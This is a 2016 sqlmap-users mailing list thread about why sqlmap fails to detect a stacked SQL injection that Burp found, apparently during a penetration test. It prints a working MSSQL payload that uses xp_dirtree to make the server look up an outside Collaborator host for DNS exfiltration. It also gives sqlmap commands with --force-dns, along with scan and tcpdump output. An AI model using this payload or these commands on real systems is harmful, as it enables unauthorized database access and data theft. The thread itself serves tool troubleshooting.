Re: [sqlmap-users] Sqlmap/DNS exfil

Brandon Perry Mon, 19 Dec 2016 15:16:37 -0800

> On Dec 19, 2016, at 5:10 PM, Mark M. <vv...@hotmail.com> wrote:
> 
> Right, that makes sense.  But at the same time, this is a valid injection (I 
> can reproduce it manually).  Perhaps there's information I can provide to 
> someone that would help improve the tool so it would catch this particular 
> case and others like it?


Why not run sqlmap through burp suite (—proxy) and manually look at the 
requests it is making to figure out what the differences are in the request you 
can make work and the ones sqlmap is trying. Maybe you need a tamper script or 
something needs to be massaged that burp was able to do without intervention.

> 
> 
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <miroslav.stam...@gmail.com 
> <mailto:miroslav.stam...@gmail.com>> wrote:
> 
>> As said, there should be at least one other SQLi technique available. In 
>> your case there is NONE. sqlmap will not blindly use dns-exfil if at least 
>> one other technique worked.
>> 
>> Bye
>> 
>> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@hotmail.com 
>> <mailto:vv...@hotmail.com>> wrote:
>> Thanks, that's good advice.  And I probably should post a little more detail 
>> on what I'm running here so others can see it as well.
>> 
>> 
>> Here's the command executing:
>> 
>> 
>> 
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory 
>> --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com 
>> <http://dns.lanternsec.com/> --force-dns --dbms "Microsoft SQL Server" --os 
>> "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org <http://sqlmap.org/>
>> 
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
>> mutual consent is illegal. It is the end user's responsibility to obey all 
>> applicable local, state and federal laws. Developers assume no liability and 
>> are not responsible for any misuse or damage caused by this program
>> 
>> [*] starting at 16:56:14
>> 
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option 
>> '--headers/--user-agent/--referer/--cookie'. Do you want to process it? 
>> [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page 
>> comparison on a sequence matcher. If no dynamic nor injectable parameters 
>> are detected, or in case of junk results, refer to user's manual paragraph 
>> 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 
>> 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter 
>> 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - 
>> WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries 
>> (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical 
>> model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be 
>> injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try 
>> to increase '--level'/'--risk' values to perform more tests. Also, you can 
>> try to rerun by providing either a valid value for option '--string' (or 
>> '--regexp'). If you suspect that there is some kind of protection mechanism 
>> involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. 
>> '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>> 
>> [*] shutting down at 16:58:03
>> 
>> 
>> 
>> And then, my capture results for DNS traffic:
>> 
>> 
>> 
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 
>> 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 
>> 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 
>> 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org 
>> <http://www.testsite.org/>. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 
>> 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? 
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 
>> 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>> 
>> 
>> It doesn't seem like an injection pattern is being tried that is getting the 
>> DNS exfiltration to occur... or else I'm doing something else wrong.
>> 
>> Thanks,
>> 
>> V
>> 
>> From: Miroslav Stampar <miroslav.stam...@gmail.com 
>> <mailto:miroslav.stam...@gmail.com>>
>> Sent: Monday, December 19, 2016 4:10 PM
>> To: Mark M.
>> Cc: sqlmap-users@lists.sourceforge.net 
>> <mailto:sqlmap-users@lists.sourceforge.net>
>> Subject: Re: [sqlmap-users] Sqlmap/DNS exfil
>>  
>> I would suggest you to run the wireshark or similar when running the 
>> --dns-domain to properly debug what is going on. There could be really lots 
>> of problems before you fine tune it (e.g. other service running on :53).
>> 
>> About the "forcing" sqlmap for using dns-exfil. It will always at least try 
>> to test it at the start of a run (if other injection technique available). 
>> Also, it will prefer other "faster" techniques (ERROR and UNION) over 
>> dns-exfil. However, there is a hidden switch "--force-dns" which will force 
>> the usage of dns-exfil even if ERROR/UNION are available.
>> 
>> As said, the best advice I can give to you is to run the wireshark during 
>> the run and really see what is going on.
>> 
>> Bye
>> 
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com 
>> <mailto:vv...@hotmail.com>> wrote:
>> I have a situation where Burp has detected the following DNS exfiltration 
>> injection for a query parameter in a web app:
>> 
>> 
>> GET 
>> /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net
>>  <http://orator.net/>\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 
>> HTTP/1.1
>> 
>> 
>> 
>> To make that a little easier to read, the injected value is:
>> 
>> 
>> ';declare @q varchar(99);set 
>> @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net 
>> <http://orator.net/>\rtf'; exec master.dbo.xp_dirtree @q;--
>> 
>> 
>> I've modified the domain and verified that I receive the DNS requests on my 
>> local DNS server (the domain which I provide to sqlmap using the 
>> --dns-domain=xxx option) when the injection is manually sent to the page.  
>> The problem is, when I pass the request to sqlmap it's not detecting that 
>> there's an injection at all.  I've provided the OS/DBMS and --level 5, but 
>> still no dice.  I'm using sqlmap v1.0.12#stable.
>> 
>> 
>> Since I've gotten many other injections to work in the past, I believe that 
>> I'm using sqlmap properly (formatting my request in a file appropriately, 
>> specifying the correct parameter to test, etc.)  However, it surprised me 
>> that what appeared to be a fairly straight-forward stacked SQL injection 
>> would slip by all of sqlmap's tests. Is there a way to force sqlmap to try 
>> DNS exfiltration injections despite no other injection technique succeeding?
>> 
>> 
>> Thanks
>> 
>> V
>> 
>> 
>> 
>> ------------------------------------------------------------------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today.http://sdm.link/intel <http://sdm.link/intel>
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net 
>> <mailto:sqlmap-users@lists.sourceforge.net>
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users 
>> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users>
>> 
>> 
>> 
>> 
>> -- 
>> Miroslav Stampar
>> http://about.me/stamparm <http://about.me/stamparm>
>> 
>> 
>> -- 
>> Miroslav Stampar
>> http://about.me/stamparm 
>> <http://about.me/stamparm>------------------------------------------------------------------------------
> Developer Access Program for Intel Xeon Phi Processors
> Access to Intel Xeon Phi processor-based developer platforms.
> With one year of Intel Parallel Studio XE.
> Training and support from Colfax.
> Order your platform 
> today.http://sdm.link/intel_______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Sqlmap/DNS exfil

Reply via email to